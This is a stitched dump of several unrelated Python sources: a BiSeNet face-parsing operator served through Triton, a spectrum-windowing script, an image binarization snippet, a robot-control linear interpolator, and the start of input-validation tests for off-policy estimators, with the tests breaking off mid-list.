{}), '(w2)\n', (3032, 3036), True, 'import numpy as np\n'), ((3084, 3110), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(7, 3)'}), '(figsize=(7, 3))\n', (3094, 3110), True, 'import matplotlib.pyplot as plt\n'), ((3198, 3213), 'matplotlib.pyplot.axis', 'plt.axis', (['"""off"""'], {}), "('off')\n", (3206, 3213), True, 'import matplotlib.pyplot as plt\n'), ((3587, 3625), 'matplotlib.collections.LineCollection', 'mc.LineCollection', (['lines'], {'linewidths': '(2)'}), '(lines, linewidths=2)\n', (3604, 3625), True, 'from matplotlib import collections as mc\n'), ((3864, 3904), 'numpy.array', 'np.array', (['([0] * 10 + [1] * 10 + [2] * 10)'], {}), '([0] * 10 + [1] * 10 + [2] * 10)\n', (3872, 3904), True, 'import numpy as np\n'), ((5172, 5242), 'matplotlib.animation.FuncAnimation', 'animation.FuncAnimation', (['fig', 'animate'], {'frames': 'w1.shape[0]', 'interval': '(20)'}), '(fig, animate, frames=w1.shape[0], interval=20)\n', (5195, 5242), True, 'import matplotlib.animation as animation\n'), ((607, 639), 'os.path.exists', 'os.path.exists', (['config.save_path'], {}), '(config.save_path)\n', (621, 639), False, 'import os\n'), ((649, 678), 'os.makedirs', 'os.makedirs', (['config.save_path'], {}), '(config.save_path)\n', (660, 678), False, 'import os\n'), ((1554, 1591), 'numpy.random.permutation', 'np.random.permutation', (['config.n_train'], {}), '(config.n_train)\n', (1575, 1591), True, 'import numpy as np\n'), ((2208, 2250), 'os.path.join', 'os.path.join', (['config.save_path', '"""w_layer1"""'], {}), "(config.save_path, 'w_layer1')\n", (2220, 2250), False, 'import os\n'), ((2252, 2275), 'numpy.array', 'np.array', (['weight_layer1'], {}), '(weight_layer1)\n', (2260, 2275), True, 'import numpy as np\n'), ((2289, 2331), 'os.path.join', 'os.path.join', (['config.save_path', '"""w_layer2"""'], {}), "(config.save_path, 'w_layer2')\n", (2301, 2331), False, 'import os\n'), ((2333, 2356), 'numpy.array', 'np.array', (['weight_layer2'], {}), '(weight_layer2)\n', (2341, 2356), True, 'import numpy as np\n'), ((2722, 2756), 'os.path.join', 'os.path.join', (['path', '"""w_layer1.npy"""'], {}), "(path, 'w_layer1.npy')\n", (2734, 2756), False, 'import os\n'), ((2775, 2809), 'os.path.join', 'os.path.join', (['path', '"""w_layer2.npy"""'], {}), "(path, 'w_layer2.npy')\n", (2787, 2809), False, 'import os\n'), ((3671, 3727), 'numpy.array', 'np.array', (['[[228, 26, 28], [77, 175, 74], [55, 126, 184]]'], {}), '([[228, 26, 28], [77, 175, 74], [55, 126, 184]])\n', (3679, 3727), True, 'import numpy 
as np\n'), ((3739, 3833), 'numpy.array', 'np.array', (['[[27, 158, 119], [217, 95, 2], [117, 112, 179], [231, 41, 138], [102, 166, 30]]'], {}), '([[27, 158, 119], [217, 95, 2], [117, 112, 179], [231, 41, 138], [\n 102, 166, 30]])\n', (3747, 3833), True, 'import numpy as np\n'), ((4751, 4773), 'numpy.zeros', 'np.zeros', (['(n1 + n2, 4)'], {}), '((n1 + n2, 4))\n', (4759, 4773), True, 'import numpy as np\n'), ((5410, 5441), 'os.path.join', 'os.path.join', (['path', '"""movie.mp4"""'], {}), "(path, 'movie.mp4')\n", (5422, 5441), False, 'import os\n'), ((5576, 5610), 'os.path.join', 'os.path.join', (['path', '"""w_layer1.npy"""'], {}), "(path, 'w_layer1.npy')\n", (5588, 5610), False, 'import os\n'), ((5629, 5663), 'os.path.join', 'os.path.join', (['path', '"""w_layer2.npy"""'], {}), "(path, 'w_layer2.npy')\n", (5641, 5663), False, 'import os\n'), ((3927, 3949), 'numpy.arange', 'np.arange', (['w1.shape[1]'], {}), '(w1.shape[1])\n', (3936, 3949), True, 'import numpy as np\n'), ((4016, 4038), 'numpy.arange', 'np.arange', (['w2.shape[2]'], {}), '(w2.shape[2])\n', (4025, 4038), True, 'import numpy as np\n'), ((1024, 1049), 'torch.from_numpy', 'torch.from_numpy', (['train_x'], {}), '(train_x)\n', (1040, 1049), False, 'import torch\n'), ((1088, 1113), 'torch.from_numpy', 'torch.from_numpy', (['train_y'], {}), '(train_y)\n', (1104, 1113), False, 'import torch\n')]
|
from abc import ABC
import cv2
import numpy as np
from Operators.DummyAlgorithmWithModel import DummyAlgorithmWithModel
from Utils.GeometryUtils import center_pad_image_with_specific_base, \
resize_with_long_side, force_convert_image_to_bgr, correct_face_orientation
from Utils.InferenceHelpers import TritonInferenceHelper
class FaceParsingOperator(DummyAlgorithmWithModel, ABC):
name = 'FaceParsing'
__version__ = 'v1.0.20210323'
def __init__(self, _inference_config, _is_test):
super().__init__(_inference_config, _is_test)
class GeneralFaceParsing(FaceParsingOperator):
"""
获取人脸面部分区,除了面部区域,其他地方准确率很低
例如耳环、眼镜等
"""
name = '自然场景下基于BiSeNet人脸面部的语义分割'
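    # (English gloss of the name above: semantic segmentation of facial regions in natural scenes, based on BiSeNet)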
__version__ = 'v1.0.20210323'
def __init__(self, _inference_config, _is_test):
"""
每个下标对应的意思
0 背景
1 皮肤区域
2 右眉毛
3 左眉毛
4 右眼睛
5 左眼睛
6 眼镜
7 右耳朵
8 左耳朵
9 耳环
10 鼻子
11 口腔
12 上嘴唇
13 下嘴唇
14 颈部
15
16 衣服
17 头发
18 帽子
"""
super().__init__(_inference_config, _is_test)
        # The model itself does not restrict the input size, but to keep inference efficient all images are unified to 512
self.candidate_image_size = (512, 512)
def get_inference_helper(self):
if self.inference_config['name'] == 'triton':
inference_helper = TritonInferenceHelper('FaceParsing',
self.inference_config['triton_url'],
self.inference_config['triton_port'],
'FaceParsing', 1)
inference_helper.add_image_input('INPUT__0', (512, 512, 3), '检测用rgb的图像',
([103.53, 116.28, 123.675], [57.375, 57.12, 58.395]))
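            # The two lists above are presumably the per-channel mean/std used to normalize
            # the input image (ImageNet statistics scaled to the 0-255 range).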
inference_helper.add_output('OUTPUT__0', (19, 512, 512), '每个类别的区域')
self.inference_helper = inference_helper
else:
raise NotImplementedError(
f"{self.inference_config['name']} helper for face parsing not implement")
def execute(self, _image, _landmark_info=None):
to_return_result = {
'semantic_segmentation': np.zeros((_image.shape[1], _image.shape[0]), dtype=np.uint8),
}
if _landmark_info is not None:
corrected_face_image, rotate_back_function = correct_face_orientation(_image, _landmark_info)
else:
corrected_face_image = _image
def _rotate_back_function(_image):
return _image
rotate_back_function = _rotate_back_function
original_h, original_w = corrected_face_image.shape[:2]
resized_image = resize_with_long_side(corrected_face_image, 512)
resized_h, resized_w = resized_image.shape[:2]
padded_image, (width_pad_ratio, height_pad_ratio) = center_pad_image_with_specific_base(
resized_image,
_width_base=512,
_height_base=512,
_output_pad_ratio=True
)
candidate_image = cv2.cvtColor(force_convert_image_to_bgr(padded_image), cv2.COLOR_BGR2RGB)
candidate_h, candidate_w = candidate_image.shape[:2]
if isinstance(self.inference_helper, TritonInferenceHelper):
result = self.inference_helper.infer(_need_tensor_check=False, INPUT__0=candidate_image.astype(np.float32))
semantic_index = result['OUTPUT__0'].squeeze()
else:
raise NotImplementedError(
f"{self.inference_helper.type_name} helper for face parsing not implement")
left_width_pad = int(width_pad_ratio * candidate_w)
top_height_pad = int(height_pad_ratio * candidate_h)
        # remove the padding
semantic_index_without_pad = semantic_index[
top_height_pad:top_height_pad + resized_h,
left_width_pad:left_width_pad + resized_w
]
        # undo the resize
resize_back_semantic_index = cv2.resize(semantic_index_without_pad, (original_w, original_h),
interpolation=cv2.INTER_NEAREST)
        # restore the original image orientation
original_orientation_semantic_index = rotate_back_function(resize_back_semantic_index)
to_return_result['semantic_segmentation'] = original_orientation_semantic_index
return to_return_result
if __name__ == '__main__':
from argparse import ArgumentParser
from Utils.AnnotationTools import annotate_segmentation
from Operators.ExampleFaceDetectOperator import GeneralUltraLightFaceDetect
from Operators.ExampleFaceAlignmentOperator import GeneralLandmark106p
from Utils.GeometryUtils import get_rotated_box_roi_from_image
ag = ArgumentParser('Face Parsing Example')
ag.add_argument('-i', '--image_path', dest='image_path', type=str, required=True, help='本地图像路径')
ag.add_argument('-u', '--triton_url', dest='triton_url', type=str, required=True, help='triton url')
ag.add_argument('-p', '--triton_port', dest='triton_port', type=int, default=8001, help='triton grpc 端口')
args = ag.parse_args()
    # assume there is only one face in the image
img = cv2.imread(args.image_path)
face_parsing_handler = GeneralFaceParsing({
'name': 'triton',
'triton_url': args.triton_url,
'triton_port': args.triton_port
}, True)
ultra_light_face_detect_handler = GeneralUltraLightFaceDetect({
'name': 'triton',
'triton_url': args.triton_url,
'triton_port': args.triton_port
}, True, 0.7, 0.5)
landmark106p_detect_handler = GeneralLandmark106p({
'name': 'triton',
'triton_url': args.triton_url,
'triton_port': args.triton_port
}, True)
face_bbox = ultra_light_face_detect_handler.execute(img)['locations'][0]['box_info']
cropped_image = get_rotated_box_roi_from_image(img, face_bbox, 1.35)
landmark_info = landmark106p_detect_handler.execute(cropped_image)
landmark106p_with_bbox_result_image = cropped_image.copy()
landmark106p_with_bbox_result_all_points = [(x, y) for x, y in
zip(landmark_info['x_locations'],
landmark_info['y_locations'])
]
face_parsing_with_bbox_result = face_parsing_handler.execute(cropped_image, landmark_info)
face_parsing_with_bbox_result_image = cropped_image.copy()
face_parsing_with_bbox_result_image = annotate_segmentation(
face_parsing_with_bbox_result_image,
face_parsing_with_bbox_result['semantic_segmentation']
)
cv2.imshow(f'face_parsing_with_bbox_result_image', face_parsing_with_bbox_result_image)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
[
"Operators.ExampleFaceAlignmentOperator.GeneralLandmark106p",
"Utils.AnnotationTools.annotate_segmentation",
"argparse.ArgumentParser",
"Utils.GeometryUtils.correct_face_orientation",
"Operators.ExampleFaceDetectOperator.GeneralUltraLightFaceDetect",
"cv2.waitKey",
"cv2.destroyAllWindows",
"Utils.GeometryUtils.resize_with_long_side",
"Utils.InferenceHelpers.TritonInferenceHelper",
"numpy.zeros",
"Utils.GeometryUtils.force_convert_image_to_bgr",
"Utils.GeometryUtils.get_rotated_box_roi_from_image",
"cv2.imread",
"Utils.GeometryUtils.center_pad_image_with_specific_base",
"cv2.imshow",
"cv2.resize"
] |
[((4815, 4853), 'argparse.ArgumentParser', 'ArgumentParser', (['"""Face Parsing Example"""'], {}), "('Face Parsing Example')\n", (4829, 4853), False, 'from argparse import ArgumentParser\n'), ((5224, 5251), 'cv2.imread', 'cv2.imread', (['args.image_path'], {}), '(args.image_path)\n', (5234, 5251), False, 'import cv2\n'), ((5456, 5588), 'Operators.ExampleFaceDetectOperator.GeneralUltraLightFaceDetect', 'GeneralUltraLightFaceDetect', (["{'name': 'triton', 'triton_url': args.triton_url, 'triton_port': args.\n triton_port}", '(True)', '(0.7)', '(0.5)'], {}), "({'name': 'triton', 'triton_url': args.\n triton_url, 'triton_port': args.triton_port}, True, 0.7, 0.5)\n", (5483, 5588), False, 'from Operators.ExampleFaceDetectOperator import GeneralUltraLightFaceDetect\n'), ((5648, 5761), 'Operators.ExampleFaceAlignmentOperator.GeneralLandmark106p', 'GeneralLandmark106p', (["{'name': 'triton', 'triton_url': args.triton_url, 'triton_port': args.\n triton_port}", '(True)'], {}), "({'name': 'triton', 'triton_url': args.triton_url,\n 'triton_port': args.triton_port}, True)\n", (5667, 5761), False, 'from Operators.ExampleFaceAlignmentOperator import GeneralLandmark106p\n'), ((5897, 5949), 'Utils.GeometryUtils.get_rotated_box_roi_from_image', 'get_rotated_box_roi_from_image', (['img', 'face_bbox', '(1.35)'], {}), '(img, face_bbox, 1.35)\n', (5927, 5949), False, 'from Utils.GeometryUtils import get_rotated_box_roi_from_image\n'), ((6565, 6683), 'Utils.AnnotationTools.annotate_segmentation', 'annotate_segmentation', (['face_parsing_with_bbox_result_image', "face_parsing_with_bbox_result['semantic_segmentation']"], {}), "(face_parsing_with_bbox_result_image,\n face_parsing_with_bbox_result['semantic_segmentation'])\n", (6586, 6683), False, 'from Utils.AnnotationTools import annotate_segmentation\n'), ((6706, 6797), 'cv2.imshow', 'cv2.imshow', (['f"""face_parsing_with_bbox_result_image"""', 'face_parsing_with_bbox_result_image'], {}), "(f'face_parsing_with_bbox_result_image',\n face_parsing_with_bbox_result_image)\n", (6716, 6797), False, 'import cv2\n'), ((6798, 6812), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (6809, 6812), False, 'import cv2\n'), ((6817, 6840), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (6838, 6840), False, 'import cv2\n'), ((2746, 2794), 'Utils.GeometryUtils.resize_with_long_side', 'resize_with_long_side', (['corrected_face_image', '(512)'], {}), '(corrected_face_image, 512)\n', (2767, 2794), False, 'from Utils.GeometryUtils import center_pad_image_with_specific_base, resize_with_long_side, force_convert_image_to_bgr, correct_face_orientation\n'), ((2910, 3023), 'Utils.GeometryUtils.center_pad_image_with_specific_base', 'center_pad_image_with_specific_base', (['resized_image'], {'_width_base': '(512)', '_height_base': '(512)', '_output_pad_ratio': '(True)'}), '(resized_image, _width_base=512,\n _height_base=512, _output_pad_ratio=True)\n', (2945, 3023), False, 'from Utils.GeometryUtils import center_pad_image_with_specific_base, resize_with_long_side, force_convert_image_to_bgr, correct_face_orientation\n'), ((4076, 4177), 'cv2.resize', 'cv2.resize', (['semantic_index_without_pad', '(original_w, original_h)'], {'interpolation': 'cv2.INTER_NEAREST'}), '(semantic_index_without_pad, (original_w, original_h),\n interpolation=cv2.INTER_NEAREST)\n', (4086, 4177), False, 'import cv2\n'), ((1381, 1514), 'Utils.InferenceHelpers.TritonInferenceHelper', 'TritonInferenceHelper', (['"""FaceParsing"""', "self.inference_config['triton_url']", 
"self.inference_config['triton_port']", '"""FaceParsing"""', '(1)'], {}), "('FaceParsing', self.inference_config['triton_url'],\n self.inference_config['triton_port'], 'FaceParsing', 1)\n", (1402, 1514), False, 'from Utils.InferenceHelpers import TritonInferenceHelper\n'), ((2249, 2309), 'numpy.zeros', 'np.zeros', (['(_image.shape[1], _image.shape[0])'], {'dtype': 'np.uint8'}), '((_image.shape[1], _image.shape[0]), dtype=np.uint8)\n', (2257, 2309), True, 'import numpy as np\n'), ((2417, 2465), 'Utils.GeometryUtils.correct_face_orientation', 'correct_face_orientation', (['_image', '_landmark_info'], {}), '(_image, _landmark_info)\n', (2441, 2465), False, 'from Utils.GeometryUtils import center_pad_image_with_specific_base, resize_with_long_side, force_convert_image_to_bgr, correct_face_orientation\n'), ((3117, 3157), 'Utils.GeometryUtils.force_convert_image_to_bgr', 'force_convert_image_to_bgr', (['padded_image'], {}), '(padded_image)\n', (3143, 3157), False, 'from Utils.GeometryUtils import center_pad_image_with_specific_base, resize_with_long_side, force_convert_image_to_bgr, correct_face_orientation\n')]
|
import numpy as np
import os
import pickle
import joblib
import sys
import glob
import torch
window_size = 1000
normality = str(sys.argv[1]) # e.g. abnormal
source = str(sys.argv[2]) # e.g. ryerson_ab_train_sigOver
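# Usage: <script> <normality> <source>, e.g. "abnormal ryerson_ab_train_sigOver"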
outname = '{}_{}.npy'.format(source, normality)
input_path = '/net/adv_spectrum/data/feature/downsample_10/{}/{}/1000_250/'.format(normality, source)
output_path = '/net/adv_spectrum/array_data/{}'.format(outname)
def array_to_window(X, window_size):
"""
Inputs:
X (np.array): Its shape should be (n_time_steps, 128)
window_size (int): the number of time steps in a window
Return:
        result (np.array): Its shape is (n_windows, window_size, 128)
"""
result = []
ind = np.arange(0, X.shape[0], window_size)
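    # Pair each window start with the next start (or the end of X) to form (start, end) index ranges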
for start, end in zip(ind, np.r_[ind[1:], X.shape[0]]):
if end - start < window_size:
# Discard the last few lines
break
result.append(X[start:end, :])
return np.array(result)
def txt_to_series(file_path, n_channels=128):
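    """
    Read a whitespace-separated text file of spectrum features and return a
    float64 array of shape (n_time_steps, n_channels).
    """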
features = []
with open(file_path, 'r') as f:
for line in f:
x = line.split()
features.append(x)
series = np.array(features).reshape((-1, n_channels)).astype('float64')
return series
series_list = []
print('Start constructing {} series....'.format(normality))
for filename in sorted(glob.glob(input_path + '*.txt')):
print(filename)
series = txt_to_series(filename)
print(series.shape)
series_list.append(series)
X_full = array_to_window(series_list.pop(0), window_size)
for i, X in enumerate(series_list):
print('Converting the {}th array to window...'.format(i))
X_windowed = array_to_window(X, window_size)
print('Concatenating...\n')
X_full = np.concatenate((X_full, X_windowed), axis=0)
print('Done converting and concatenating!')
np.save(output_path, X_full)
print('The array has been saved at {}'.format(output_path))
|
[
"numpy.save",
"numpy.array",
"numpy.arange",
"glob.glob",
"numpy.concatenate"
] |
[((1864, 1892), 'numpy.save', 'np.save', (['output_path', 'X_full'], {}), '(output_path, X_full)\n', (1871, 1892), True, 'import numpy as np\n'), ((744, 781), 'numpy.arange', 'np.arange', (['(0)', 'X.shape[0]', 'window_size'], {}), '(0, X.shape[0], window_size)\n', (753, 781), True, 'import numpy as np\n'), ((991, 1007), 'numpy.array', 'np.array', (['result'], {}), '(result)\n', (999, 1007), True, 'import numpy as np\n'), ((1377, 1408), 'glob.glob', 'glob.glob', (["(input_path + '*.txt')"], {}), "(input_path + '*.txt')\n", (1386, 1408), False, 'import glob\n'), ((1773, 1817), 'numpy.concatenate', 'np.concatenate', (['(X_full, X_windowed)'], {'axis': '(0)'}), '((X_full, X_windowed), axis=0)\n', (1787, 1817), True, 'import numpy as np\n'), ((1208, 1226), 'numpy.array', 'np.array', (['features'], {}), '(features)\n', (1216, 1226), True, 'import numpy as np\n')]
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import numpy as np
from PIL import Image
import pylab as pl
import matplotlib.cm as cm
def int2B(pat, binary=True):
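    """
    Flatten a grayscale pattern into a 1-D vector of length 54000.
    binary=True : pixel values > 130 map to 1, everything else to 0.
    binary=False: entries whose column index j > 75 map to 1, others to -1
                  (note that this branch tests the column index, not the pixel value).
    """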
_ = np.array(pat, float)
for i in range(len(_)):
for j in range(len(_[i])):
if binary:
if pat[i][j] > 130:
_[i][j] = 1
else:
_[i][j] = 0
else:
if j > 75:
_[i][j] = 1
else:
_[i][j] = -1
r = np.array(_, float).reshape(1,54000).flatten()
return r
un = np.array(Image.open('data/picture/1.jpg').convert('L'))
deux = np.array(Image.open('data/picture/2.jpg').convert('L'))
trois = np.array(Image.open('data/picture/3.jpg').convert('L'))
quatre = np.array(Image.open('data/picture/4.jpg').convert('L'))
visages = [int2B(un), int2B(deux), int2B(trois), int2B(quatre)]
|
[
"numpy.array",
"PIL.Image.open"
] |
[((169, 189), 'numpy.array', 'np.array', (['pat', 'float'], {}), '(pat, float)\n', (177, 189), True, 'import numpy as np\n'), ((613, 645), 'PIL.Image.open', 'Image.open', (['"""data/picture/1.jpg"""'], {}), "('data/picture/1.jpg')\n", (623, 645), False, 'from PIL import Image\n'), ((676, 708), 'PIL.Image.open', 'Image.open', (['"""data/picture/2.jpg"""'], {}), "('data/picture/2.jpg')\n", (686, 708), False, 'from PIL import Image\n'), ((740, 772), 'PIL.Image.open', 'Image.open', (['"""data/picture/3.jpg"""'], {}), "('data/picture/3.jpg')\n", (750, 772), False, 'from PIL import Image\n'), ((805, 837), 'PIL.Image.open', 'Image.open', (['"""data/picture/4.jpg"""'], {}), "('data/picture/4.jpg')\n", (815, 837), False, 'from PIL import Image\n'), ((538, 556), 'numpy.array', 'np.array', (['_', 'float'], {}), '(_, float)\n', (546, 556), True, 'import numpy as np\n')]
|
import numpy as np
from ...utils import transform_utils as T
from .base_interpolator import Interpolator
class LinearInterpolator(Interpolator):
"""
Simple class for implementing a linear interpolator.
Abstracted to interpolate n-dimensions
Args:
max_delta: Maximum single change in dx allowed by the system.
Note that this should be in units magnitude / step
ndim: Number of dimensions to interpolate
controller_freq: Frequency (Hz) of the controller
policy_freq: Frequency (Hz) of the policy model
ramp_ratio: Percentage of interpolation timesteps across which we will interpolate to a goal position.
            Note: Num total interpolation steps will be equal to np.ceil(ramp_ratio * controller_freq / policy_freq)
i.e.: how many controller steps we get per action space update
use_delta_goal: Whether to interpret inputs as delta goals from a current position or absolute values
ori_interpolate: Whether this interpolator is interpolating angles (orientation) or not
"""
def __init__(self,
max_delta,
ndim,
controller_freq,
policy_freq,
ramp_ratio=0.2,
use_delta_goal=False,
ori_interpolate=False,
):
self.max_delta = max_delta # Maximum allowed change per interpolator step
self.goal = None # Requested goal
self.start = None # Start state
self.dim = ndim # Number of dimensions to interpolate
self.order = 1 # Order of the interpolator (1 = linear)
self.step = 0 # Current step of the interpolator
self.total_steps = \
np.ceil(ramp_ratio * controller_freq / policy_freq) # Total num steps per interpolator action
self.use_delta_goal = use_delta_goal # Whether to use delta or absolute goals (currently
# not implemented yet- TODO)
self.ori_interpolate = ori_interpolate # Whether this is interpolating orientation or not
def set_goal(self, goal, start=None):
"""
set_goal: Takes a requested goal and updates internal parameters for next interpolation step
Args:
goal: Requested goal (either absolute or delta value). Should be same dimension as self.dim
start: Only relevant if "self.use_delta_goal" is set. This is the current state from which
the goal will be taken relative to
Returns:
None
"""
# First, check to make sure requested goal shape is the same as self.dim
if goal.shape[0] != self.dim:
print("Requested goal: {}".format(goal))
raise ValueError("LinearInterpolator: Input size wrong for goal; got {}, needs to be {}!".format(
goal.shape[0], self.dim))
# Update goal and save start state
self.goal = np.array(goal)
self.start = start
# Reset interpolation steps
self.step = 0
def get_interpolated_goal(self, x):
"""
get_interpolated_goal: Takes the current state and provides the next step in interpolation given
the remaining steps.
            NOTE: If this interpolator is for orientation, it is assumed to be receiving a relative rotation from the initial goal that was set
Args:
x: Current state. Should be same dimension as self.dim
NOTE: If this interpolator is for orientation, x is assumed to be the current relative rotation from
the initial goal that was set. Otherwise, it is assumed to be an absolute value
Returns:
x_current: Next position in the interpolated trajectory
"""
# First, check to make sure x in same shape as self.dim
if x.shape[0] != self.dim:
print("Current position: {}".format(x))
raise ValueError("LinearInterpolator: Input size wrong; needs to be {}!".format(self.dim))
# Also make sure goal has been set
if self.goal is None:
raise ValueError("LinearInterpolator: Goal has not been set yet!")
# Calculate the desired next step based on remaining interpolation steps
if self.ori_interpolate:
# This is an orientation interpolation, so we interpolate linearly around a sphere instead
goal = self.goal
if self.dim == 3:
# this is assumed to be euler (x,y,z), so we need to first map to quat
x = T.mat2quat(T.euler2mat(x))
goal = T.mat2quat(T.euler2mat(self.goal))
# Interpolate to the next sequence
x_current = T.quat_slerp(x, goal,
fraction=(self.step + 1) / self.total_steps)
# Check if dx is greater than max value; if it is; clamp and notify user
dx, clipped = T.clip_rotation(T.quat_distance(x_current, x), self.max_delta)
if clipped:
print(
"LinearInterpolator: WARNING: Requested interpolation (ori) exceeds max speed;"
"clamping to {}.".format(dx))
# Map back to euler if necessary
x_current = dx
if self.dim == 3:
x_current = T.mat2euler(T.quat2mat(x_current))
else:
# This is a normal interpolation
dx = (self.goal - x) / (self.total_steps - self.step)
# Check if dx is greater than max value; if it is; clamp and notify user
dx, clipped = T.clip_translation(dx, self.max_delta)
if clipped:
print("LinearInterpolator: WARNING: Requested interpolation "
"exceeds max speed; clamping to {}.".format(dx))
x_current = x + dx
# Increment step if there's still steps remaining based on ramp ratio
if self.step < self.total_steps - 1:
self.step += 1
# Return the new interpolated step
return x_current
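# Minimal usage sketch (illustrative values only, assuming a 3-DoF position target,
# a 500 Hz controller and a 20 Hz policy):
#   interp = LinearInterpolator(max_delta=0.1, ndim=3, controller_freq=500, policy_freq=20)
#   interp.set_goal(np.array([0.10, 0.00, 0.25]))
#   next_pos = interp.get_interpolated_goal(np.array([0.0, 0.0, 0.0]))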
|
[
"numpy.array",
"numpy.ceil"
] |
[((2000, 2051), 'numpy.ceil', 'np.ceil', (['(ramp_ratio * controller_freq / policy_freq)'], {}), '(ramp_ratio * controller_freq / policy_freq)\n', (2007, 2051), True, 'import numpy as np\n'), ((3292, 3306), 'numpy.array', 'np.array', (['goal'], {}), '(goal)\n', (3300, 3306), True, 'import numpy as np\n')]
|
import re
import pytest
import numpy as np
import torch
from obp.types import BanditFeedback
from obp.ope import (
DirectMethod,
DoublyRobust,
DoublyRobustWithShrinkage,
SwitchDoublyRobust,
SelfNormalizedDoublyRobust,
)
from conftest import generate_action_dist
# prepare instances
dm = DirectMethod()
dr = DoublyRobust()
dr_shrink_0 = DoublyRobustWithShrinkage(lambda_=0.0)
dr_shrink_max = DoublyRobustWithShrinkage(lambda_=1e10)
sndr = SelfNormalizedDoublyRobust()
switch_dr_0 = SwitchDoublyRobust(tau=0.0)
switch_dr_max = SwitchDoublyRobust(tau=1e10)
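# With a hyperparameter of 0, both variants should collapse to DirectMethod, and with a very
# large value to plain DoublyRobust; these relationships are asserted in the tests further below.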
dr_estimators = [dr, dr_shrink_0, sndr, switch_dr_0]
# dr and self-normalized dr
# action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, description
invalid_input_of_dr = [
(
generate_action_dist(5, 4, 3),
None,
np.zeros(5, dtype=int),
np.ones(5),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"action must be ndarray",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int),
None,
np.ones(5),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"reward must be ndarray",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int),
np.zeros(5, dtype=int),
None,
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"pscore must be ndarray",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int),
np.zeros(5, dtype=int),
np.ones(5),
np.random.choice(3, size=5),
None,
"estimated_rewards_by_reg_model must be ndarray",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=float),
np.zeros(5, dtype=int),
np.ones(5),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"action elements must be non-negative integers",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int) - 1,
np.zeros(5, dtype=int),
np.ones(5),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"action elements must be non-negative integers",
),
(
generate_action_dist(5, 4, 3),
"4",
np.zeros(5, dtype=int),
np.ones(5),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"action must be ndarray",
),
(
generate_action_dist(5, 4, 3),
np.zeros((3, 2), dtype=int),
np.zeros(5, dtype=int),
np.ones(5),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"action must be 1-dimensional",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int) + 8,
np.zeros(5, dtype=int),
np.ones(5),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"action elements must be smaller than the second dimension of action_dist",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int),
"4",
np.ones(5),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"reward must be ndarray",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int),
np.zeros((3, 2), dtype=int),
np.ones(5),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"reward must be 1-dimensional",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int),
np.zeros(4, dtype=int),
np.ones(5),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"action and reward must be the same size.",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int),
np.zeros(5, dtype=int),
"4",
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"pscore must be ndarray",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int),
np.zeros(5, dtype=int),
np.ones((5, 3)),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"pscore must be 1-dimensional",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int),
np.zeros(5, dtype=int),
np.ones(4),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"action, reward, and pscore must be the same size.",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int),
np.zeros(5, dtype=int),
np.arange(5),
np.random.choice(3, size=5),
np.zeros((5, 4, 3)),
"pscore must be positive",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int),
np.zeros(5, dtype=int),
np.ones(5),
np.random.choice(3, size=5),
np.zeros((5, 4, 2)),
"estimated_rewards_by_reg_model.shape must be the same as action_dist.shape",
),
(
generate_action_dist(5, 4, 3),
np.zeros(5, dtype=int),
np.zeros(5, dtype=int),
np.ones(5),
np.random.choice(3, size=5),
"4",
"estimated_rewards_by_reg_model must be ndarray",
),
]
@pytest.mark.parametrize(
"action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, description",
invalid_input_of_dr,
)
def test_dr_using_invalid_input_data(
action_dist: np.ndarray,
action: np.ndarray,
reward: np.ndarray,
pscore: np.ndarray,
position: np.ndarray,
estimated_rewards_by_reg_model: np.ndarray,
description: str,
) -> None:
# estimate_intervals function raises ValueError of all estimators
for estimator in [dr, sndr]:
with pytest.raises(ValueError, match=f"{description}*"):
_ = estimator.estimate_policy_value(
action_dist=action_dist,
action=action,
reward=reward,
pscore=pscore,
position=position,
estimated_rewards_by_reg_model=estimated_rewards_by_reg_model,
)
with pytest.raises(ValueError, match=f"{description}*"):
_ = estimator.estimate_interval(
action_dist=action_dist,
action=action,
reward=reward,
pscore=pscore,
position=position,
estimated_rewards_by_reg_model=estimated_rewards_by_reg_model,
)
# dr and self-normalized dr
# action_dist, action, reward, pscore, position, estimated_rewards_by_reg_model, description
invalid_input_tensor_of_dr = [
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
None,
torch.zeros(5, dtype=torch.int64),
torch.ones(5),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
"action must be Tensor",
),
(
torch.from_numpy(generate_action_dist(5, 4, 3)),
torch.zeros(5, dtype=torch.int64),
None,
torch.ones(5),
torch.from_numpy(np.random.choice(3, size=5)),
torch.zeros((5, 4, 3)),
